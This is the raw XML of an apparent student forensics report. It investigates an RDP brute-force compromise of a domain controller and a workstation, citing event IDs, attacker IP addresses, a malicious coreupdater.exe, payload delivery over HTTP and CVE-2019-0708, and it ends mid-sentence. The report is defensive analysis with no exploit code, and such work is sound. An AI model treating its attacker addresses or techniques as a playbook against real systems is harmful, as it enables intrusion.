          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">The investigation will focus on identifying if the attacker stole or accessed any data, determining the timeframe of access, and analyzing artifacts that may confirm exfiltration or further lateral movement across the network.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="138"/>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="360" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Executive Summary</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Incident Overview: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An incident involving the Domain Controller (DC01) and a Desktop machine has raised concerns about unauthorized access to sensitive files, including a confidential "Szechuan sauce" recipe and other potentially critical data. The systems involved are runnin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">g outdated operating systems (Windows Server 2012 and Windows 10), which may have exposed vulnerabilities exploited by the attacker.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Key Findings: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Operating Systems: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Server: Windows Server 2012 R2 (x64 architecture).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Desktop: Windows 10 (x64 architecture).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Overview of the Initial Entry Vector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 initial entry vector of the breach was determined to be a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Remote Desktop Protocol (RDP) brute-force attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. The RDP brute-force attack exploited default configurations and exposed ports. The presence of outdated systems without critical patches makes them vulnerable to CVE-2019-0708, a well-known RDP vulnerability that enables remote code execution if exploite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">d" (CVE-2019-0708, 2019.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Evidence Collection Process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To determine the method of entry, the following steps were performed:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>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2"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">To identify signs of brute-force access, FTK Imager was used to extract the Security event logs from C:\Windows\System32\winevt\Logs\Security.evtx. This allowed for analysis of failed and successful logon attempts, providing critical evidence of initial ac</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">cess" (SANS Institute, 2024)</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664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>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2"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">These logs were then analyzed using the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows Event Viewer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">eventvwr.msc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="0" w:before="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="700"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Filtering for Relevant Event IDs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Event ID 4625</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Indicates failed login attempts.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Event ID 4624</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Indicates successful logins.</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Brute-Force Detection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 analysis revealed an unusually high number of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">failed login attempts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Event ID 4625) between </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">11:21:46 PM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">12:13:43 AM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">09/18/2020</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. The attempts were traced to a workstation with the hostname Kali, a known penetration testing platform.</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Technical Evidence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Source IP Address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: 194.61.24.102</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Login Attempts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: 462 failed attempts within 1 hour.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These findings clearly point to a brute-force attack, where an attacker systematically attempted to guess valid credentials to gain access to the system.</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Successful Logins and Malware Delivery</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After multiple failed attempts, a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">successful login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Event ID 4624) was observed during the same timeframe, specifically originating from the following IP addresses:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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10.42.85.10 (DC01 Domain Controller).</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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10.42.85.115 (Desktop workstation).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Once authenticated, the attacker likely leveraged the compromised credentials to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">deploy malware</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserv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Supporting Evidence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Volatility3 Analysis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: The windows.netstat plugin revealed a suspicious network connection from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">10.42.85.10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">203.78.103.109</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. This connection corresponds to the execution of a process named coreupdater.exe (PID: 3644).</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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PCAP Analysis in Wireshark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: The PCAP file revealed the transfer of a malicious payload from IP 194.61.24.102 to the compromised systems using HTTP. A </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">SimpleHTTP Python server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> was identified as the delivery mechanism for the malware.</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Vulnerability Exploited</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Based on the evidence, the attacker likely exploited a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">vulnerability in Remote Desktop Protocol (RDP)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. The default RDP port </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">3389</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> was open, which is a common target for brute-force attacks. Additionally, the system may have been unpatched for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2019-0708</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> ("BlueKeep"), a critical vulnerability in Windows RDP that allows remote code execution.</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Key Takeaways</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Initial Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: RDP brute-force attack originating from IP 194.61.24.102.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Evidence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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High failed logins (Event ID 4625) followed by successful logins (Event ID 4624).</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Malicious network activity and malware delivery (coreupdater.exe).</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Open RDP port and possible unpatched CVE-2019-0708.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Recommendation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Immediate implementation of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">multi-factor authentication (MFA)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> and strong password policies.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="139"/>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="ffffff" w:fill="ffffff"/>
        <w:spacing w:after="0" w:before="0" w:line="346" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="34"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="139"/>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="ffffff" w:fill="ffffff"/>
        <w:spacing w:after="0" w:before="0" w:line="346" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Detailed Report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What’s the Operating System of the Server?</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Using FTK Imager, the SOFTWARE registry hive was extracted and loaded in Registry Explorer to identify OS details as seen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mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5514975" cy="2790825"/>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7336" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId22"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5514975" cy="2790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34.25pt;height:219.75pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId22"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Fig 1. Exporting Software registry</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mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5943600" cy="319087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24817" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId23"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943599" cy="31908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8.00pt;height:251.25pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId23"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Fig 2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Registry Explorer</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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Results:</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CurrentVersion: 6.3</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CurrentBuild: 9600</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Product Name: Windows Server 2012 R2 Standard Evaluation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720"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirmed with Volatility3:</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C:\Users\student\Desktop\volatility3-2.5.2&gt;py vol.py -f "C:\Users\student\Desktop\ForensicsProject\DC01\DC01-memory\citadeldc01.mem" windows.info</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352425" cy="666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223996" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId24"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="352424" cy="66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7.75pt;height:5.25pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId24" o:title=""/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5172075" cy="2943225"/>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066019" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId25"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5172074"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07.25pt;height:231.75pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId25"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 Volatility Server OS version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MachineType: 34404 which translates to 0x8664 in hexadecimal, which corresponds to the x86-64 architecture (64-bit system).</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Based on the evidence provided, the OS is: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
